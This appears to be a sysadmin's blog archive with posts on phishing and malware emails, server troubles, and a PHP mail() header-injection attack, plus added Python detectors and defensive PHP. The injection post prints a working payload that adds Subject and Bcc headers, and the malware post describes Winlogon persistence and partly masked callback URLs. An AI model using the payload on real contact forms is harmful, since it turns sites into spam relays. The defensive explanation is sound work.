Worldpay CARD Transaction Confirmation Spam/Virus

June 25th, 2009

This afternoon I received an email with the subject “Worldpay CARD transaction Confirmation”, which instantly caught my attention because I use Worldpay while paying off one of my credit cards, and for a moment I wondered if I had done it and forgotten about it.

The email content was as follows:

Thank you!

Your transaction has been processed by WorldPay, on behalf of Amazon Inc.

The invoice file is attached to this message.
This is not a tax receipt.
We processed your payment.
Amazon Inc has received your order,
and will inform you about delivery.
Sincerely,
Amazon Team

This confirmation only indicates that your transaction has been processed successfully.
It does not indicate that your order has been accepted.
It is the responsibility of Amazon Inc to confirm that your order has been accepted, and to deliver any goods or services you have ordered.

All very convincing and official-looking, but Amazon doesn’t use Worldpay, and the email was not sent to amazon@<my email domain> – it was sent to my office address which is only used for, well, office stuff.

The email attachment is a plain HTML file, so attachment filters that only look for executables let it straight through, but it consists of a single META REFRESH line that redirects the browser to an executable file hosted elsewhere, so don’t open the attachment.
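As an added example (not part of the original post), here is a small Python checker for exactly this trick: it parses an HTML attachment, pulls the target out of every META REFRESH tag, and flags any target whose path ends in an executable extension. The sample attachment and the invoice.example host are constructed for the demonstration; the list of extensions is my own choice.

```python
import re
from html.parser import HTMLParser

# File types a mail client would hand straight to the OS to run (assumption:
# extend to taste for your environment).
EXECUTABLE_EXTENSIONS = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".msi")


class MetaRefreshFinder(HTMLParser):
    """Collect the target URL of every <meta http-equiv="refresh"> tag."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        if tag != "meta":                      # HTMLParser lower-cases tag names
            return
        a = {k: (v or "") for k, v in attrs}   # ...and attribute names
        if a.get("http-equiv", "").strip().lower() != "refresh":
            return
        # content looks like "0;url=http://...": the delay and the 'url=' are
        # optional and the URL may be quoted, so parse generously.
        m = re.match(r"\s*\d*\s*;?\s*(?:url\s*=\s*)?['\"]?([^'\"\s]+)",
                     a.get("content", ""), re.I)
        if m and not m.group(1).isdigit():     # a bare delay is not a target
            self.targets.append(m.group(1))


def refresh_targets(html):
    """All META REFRESH targets in the document, in order."""
    p = MetaRefreshFinder()
    p.feed(html)
    p.close()
    return p.targets


def suspicious_refresh_targets(html):
    """Refresh targets whose path (ignoring query and fragment) ends in an executable extension."""
    found = []
    for url in refresh_targets(html):
        path = url.split("?", 1)[0].split("#", 1)[0]
        if path.lower().endswith(EXECUTABLE_EXTENSIONS):
            found.append(url)
    return found


# Constructed sample: what such an "invoice" attachment typically contains.
SAMPLE_ATTACHMENT = """<html><head>
<META HTTP-EQUIV="Refresh" CONTENT="0;url=http://invoice.example/WorldPay_invoice.exe">
</head><body></body></html>"""


if __name__ == "__main__":
    print(suspicious_refresh_targets(SAMPLE_ATTACHMENT))
```

Run it over the decoded attachment (for a message on disk, `email.message_from_file(...).walk()` and `get_payload(decode=True)` on each text/html part gets you the bytes); a non-empty result from suspicious_refresh_targets is reason enough to bin the message.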

‘Your internet access is going to get suspended’ Email

November 10th, 2008

If you receive an email with the subject ‘Your internet access is going to get suspended’ then don’t panic – it’s another virus doing the rounds that sends out these worryingly-phrased emails in an attempt to trick you into running the attachment and infecting yourself with the payload. Several sites have picked up on it and a few of the popular virus scanning packages had spotted it already.

The message reads:

Your internet access is going to get suspended

The Internet Service Provider Consorcium was made to protect the rights of
software authors, artists.  We conduct regular wiretapping on our networks,
to monitor criminal acts.

We are aware of your illegal activities on the internet wich were originating from

You can check the report of your activities in the past 6 month that we have
attached. We strongly advise you to stop your activities regarding the illegal
downloading of copyrighted material of your internet access will be suspended.

Sincerely
ICS Monitoring Team

The message contains a randomly-named zip file in the format user-XXXXXXXX-activities.zip, where XXXXXXXX is a string of random characters; extracting it yields user-XXXXXXXX-activities.exe.

The malware registers a Winlogon notification package so that its module is loaded into the address space of winlogon.exe (which runs as SYSTEM, so the payload does too). The files cabpck.dll (detected as Mal/TinyDL-T by Sophos), k86.bin and krnlcab.sys (detected as Backdoor:Win32/Haxdoor by Microsoft) are created in the %System% folder.

A directory %Temp%\msi_setup will be created and a new connection is made to one of these hosts: http://****-****.biz/jerken/data.php?trackid=706172616D3D6 or http://*****.net/22/data.php?trackid=706172616D3D636D64266C616E6

It makes a change from the usual ‘Please find your receipt attached’ approach, but my main concern is the number of clients who will instantly think they’ve done something wrong and go ahead and get infected.

Email Exchange of the Week

April 25th, 2007

By now, many of you will be well aware of my hatred for all things MySpace-related. Here’s a typical email exchange, illustrating just why I detest them…

    Subject: you are downloaded stuff to my computer without my permission
    i do not know why u r pop up on my screen but can u please tnot pop up

Sure, I can ‘tnot pop up’. Suspecting another d04.net scam, since the email had come in via the d04.net account, I wrote back:

    Hi,

    D04.net does not download anything to anyone’s computer. It is a simple web page. Please read about what d04.net is before emailing. Thanks.

    http://www.d04.net/

    What link did you click on to get to the website? What site did it link to? (should end in d04.net is it’s on our service).

    D

Of course, that didn’t actually make the writer stop and think…

    yes it does it putting nasty web sites on my comnputer thank i have alrwady report it to spam any way u do not know what u are talking about every time i trying to send someone a message a my space your web site po up why

Oh noes! I’ve been ‘alrwady report to spam’! I write back again…

    Please tell me what address is at the top of the page. Do you see a blue bar across the top with a ‘Report This Site’ button on it? If so, please click the button and I will know what site you are talking about.

    Please don’t tell me what my site does or doesn’t do – I wrote it. If you are not willing to answer the questions I ask, I can’t help you.

    D

But no, I was WRONG! I obviously DON’T know what my own website does…

    yes it does when i try to get on my space to send message to some one why do your web page come up u know i am going to report u to spam

Perhaps my web page comes up because.. I dunno.. you’re not looking at MySpace anymore or something equally impossible? Honestly, I couldn’t be bothered to write back after this because it was only going to go downhill from here. Sheesh!

Well something’s amiss…

July 7th, 2006

Just checked the admin email account for the other company I work for and we’ve suddenly got 20,000 emails clogging everything up. What the blinking flip?!? Almost every one is a message from Cron along the lines of:

    /bin/sh: /usr/bin/fix-mysql.sock: Permission denied

which I’m sure never used to happen.

We only actually found out about this because I checked the email account to see if there was an error message from sendmail. A client’s new server has decided to stop sending out email shortly before their site goes live (and right before I demonstrated how ace the site was – argh!) and it turns out that somewhere in the bowels of the machine the IP address for domain.com is still pointing to the old server. www.domain.com is fine, and domain.com is still resolving correctly from anywhere on the internet, but internally the IP address for domain.com is wrong.

Or at least it was. Ping from within the server now resolves correctly but email still isn’t getting out. I’ve given up for the weekend, too – heheheh.

Servers, Firewalls and Dialup on the Powerbook. Oh my!

June 6th, 2006

The fun all started when we moved offices. We actually stayed within the same building but moved from the slightly-newer part of the building into the slightly-older part. This meant that the fibre cable transporting our Internet connection across the entire roof of the building was redundant and BT had to be called to connect it to a different – hopefully much shorter – piece of cable. BT have been called, and in their infinite wisdom they won’t help us until we find an account number for them.

So, no problem, as a temporary measure we’ll use the high speed Internet access that comes with the building. We track down Dave the Network Bloke and he fixes us up with a couple of live ports so we have Internets in t’office. Unfortunately, since several large companies have moved into the office complex it’s no longer ‘High Speed’. In fact it’s absolute shite. No matter! It’s only for a few days. Possibly.

The next problem to rear its ugly head was regarding sending mail using SMTP. No problem, we’ll just use our own server as usual. In order to do this I need to add the IP of the connection to the list of permitted relayers on the server – pretty straightforward stuff. Unfortunately I remember why we left the built-in (Once) High Speed Internet – they block a port required for us to configure our server. It’s an outgoing port, but they’ve blocked it nonetheless. Hnnnng!

O-Kaaay. The only available option at this point is to hook my 15in Powerbook up to my Sony Ericsson k750i via Bluetooth and create a dialup connection that will allow me to bypass this shitty firewall and configure the server. I run through the pretty little OSX configuration wizard and the Powerbook connects to the k750i without problems… but it won’t dial. It prompts for permission to connect to the Internet and does nothing. Eventually it transpires that I need to select the ‘Ericsson T39 14.4′ script, and hey presto – it dials the 123-Reg’s 0845 Dialup number and away we go.

Except that, because the walls are full of wire, I only get two bars on my phone and the connection is pretty much halved from 14.4. Eventually it crawls through the login process and I remember which buttons to click on the first go (saving me several minutes on the phone bill, no doubt) and I get to enter the IP address of the Formerly High Speed Internet Connection. Huzzah! I can send email!

Unfortunately so can everyone in the office complex, but I won’t tell them if you won’t.

PHP mail() Email Injection Attack Allows Spammers to Send Email

February 14th, 2006

I was at a client’s last week and the guy who handles the email mentioned that they were getting a lot of spam from the same email addresses, all of them at the default hostname of our server. I had a quick look and, sure enough, email was being sent through the mail script behind my client’s Contact Us page. Because the To: address is hard-coded into the script, my client received copies of the spam as well as the injected recipients.

How the Email Injection Attack works…

The injection attack works against any mailing script that passes unchecked user input into the headers argument of the PHP mail() function. If the script accepts a name and email address and formats those into the From: field of your email, then they can be used to insert extra headers, and therefore extra recipients, anonymously.

Ordinarily you would take a name ($name) and an email address ($email) and create a string like so:

    $headers="From: $name <$email>\r\n";

which creates:

    From: MyName <user@domain.tld>

followed by a ‘\r\n’, or Carriage Return + Line Feed, which is what separates one header from the next.

Using a form on another server, or even the existing form itself (client-side length or format checks are no obstacle, because they run in the spammer’s browser and can simply be bypassed), the spammer submits the following as $name:

    blah%0ASubject:SpammerSubject%0Abcc:victim@domain2.tld

PHP’s mail() function puts these into the headers as usual, but once the form data is URL-decoded each %0A is a line feed, so the headers now contain an extra Subject: and a Bcc: field that were not there before, and the mail transport (which accepts a bare LF as a line ending) delivers a copy to the injected address. Either the $name or $email variable (in our example) can be used for this, and because a blank line ends the header block, the spammer can inject a Content-Type: header and a MIME body of their own just as easily, so there’s nothing to stop them attaching files.
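Here is an added example, not from the original post and not the PHP script it describes, that reproduces the mechanism in Python so it can be run anywhere: the vulnerable header builder is a line-for-line mirror of the `$headers` string above, the parser shows what a mail transport sees after the payload goes in, and a hardened builder shows the fix (refuse any CR or LF in the field, validate the address, and quote the display name). The function names and the sample sender address are mine; the payload is the one from the post.

```python
import re
from email import message_from_string
from email.utils import formataddr
from urllib.parse import unquote


def build_from_header_vulnerable(name: str, addr: str) -> str:
    """Mirror of the page's $headers="From: $name <$email>\\r\\n": no checks at all."""
    return f"From: {name} <{addr}>\r\n"


def build_from_header_hardened(name: str, addr: str) -> str:
    """Refuse anything that could start a new header line, then quote the display name.

    The CR/LF check is the real control: formataddr() quotes RFC 5322 specials
    such as commas and angle brackets, but it does not neutralise line breaks.
    """
    for field in (name, addr):
        if re.search(r"[\r\n]", field):
            raise ValueError("CR/LF in header field: possible header injection")
    if not re.fullmatch(r"[^@\s<>]+@[^@\s<>]+\.[^@\s<>]+", addr):
        raise ValueError("malformed email address")
    return "From: " + formataddr((name, addr)) + "\r\n"


def parse_header_block(headers: str) -> dict:
    """Split a raw header block the way an MTA would; returns {name: [values]}."""
    msg = message_from_string(headers + "\r\n")   # the blank line ends the headers
    seen = {}
    for key, value in msg.items():
        seen.setdefault(key.lower(), []).append(value)
    return seen


def is_rejected(name: str, addr: str) -> bool:
    """True if the hardened builder refuses this name/address pair."""
    try:
        build_from_header_hardened(name, addr)
    except ValueError:
        return True
    return False


# Constructed sample input: the payload from the post, URL-decoded exactly as
# the web server decodes form data before the script ever sees $name.
PAYLOAD_NAME = unquote("blah%0ASubject:SpammerSubject%0Abcc:victim@domain2.tld")
SENDER_ADDR = "user@domain.tld"   # assumed legitimate address for the demo


if __name__ == "__main__":
    injected = parse_header_block(build_from_header_vulnerable(PAYLOAD_NAME, SENDER_ADDR))
    print("vulnerable builder yields:", injected)          # from, subject AND bcc
    print("hardened builder rejects payload:", is_rejected(PAYLOAD_NAME, SENDER_ADDR))
    print("hardened builder, legit input:", build_from_header_hardened("MyName", SENDER_ADDR))
```

The parse step is the instructive part: the attacker’s “name” became three headers, and the Bcc: value even swallowed the real sender’s address, which is why the spammer’s mail came out looking like it was from the server’s own hostname.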

So How Do I Protect Against Email Header Injection Attacks?

Thankfully, protecting yourself is quite easy – probably the easiest way is to check the vulnerable fields for illegal content as soon as your processing script receives them. A name or email address never legitimately contains a line break, so rejecting any carriage return or line feed outright catches every variant regardless of which header the spammer tries to add. My approach was to write a simple function using a regular expression, thus:

    <?php

    // Reject a form field that contains injected mail headers, alert, and stop.
    // Fixed from the original version: eregi() no longer exists in PHP 7+, the
    // old pattern demanded a space after the colon so "bcc:victim@..." slipped
    // straight past it, and the alert mail's own Subject: was built from a
    // client-supplied header (X-Forwarded-For), making the alert injectable too.
    function spamcheck($spammed_field) {

        // Any CR/LF, or a Cc:/Bcc:/Subject: header name, has no business in a
        // name or address field.
        if (preg_match('/[\r\n]|\b(b?cc|subject)\s*:/i', $spammed_field)) {

            // Client-supplied headers are hints only; validate them as IP
            // addresses before they go anywhere near another mail() call.
            $spamhost = $_SERVER['REMOTE_HOST'] ?? '';
            $spamrefr = $_SERVER['HTTP_REFERER'] ?? '';
            $spamaddr = $_SERVER['HTTP_X_FORWARDED_FOR'] ?? '';
            if (!filter_var($spamaddr, FILTER_VALIDATE_IP)) { $spamaddr = $_SERVER['HTTP_CLIENT_IP'] ?? ''; }
            if (!filter_var($spamaddr, FILTER_VALIDATE_IP)) { $spamaddr = $_SERVER['REMOTE_ADDR'] ?? 'unknown'; }
            $thisfile = $_SERVER['SCRIPT_NAME'] ?? '';

            // The offending field goes in the body only, never in a header.
            $spamtext = "FILE: $thisfile \nFROM: $spamrefr \nADDR: $spamaddr \nHOST: $spamhost \nINFO:\n$spammed_field\n";

            mail("spamcheck@domain.tld", "ALERT: $spamaddr", $spamtext, "From: SpamCheck <spamcheck@domain.tld>\r\n");

            die();
        }
    }

    ?>

All you have to do to check the vulnerable fields is include the function and call it for each one:

    include('spamcheck.php');
    spamcheck($name);
    spamcheck($email);

If ‘Cc:’, ‘Bcc:’ or ‘Subject:’ is found somewhere it shouldn’t be, the script generates an email containing the name of the script and the spammer’s IP address, sends it to spamcheck@domain.tld and promptly dies.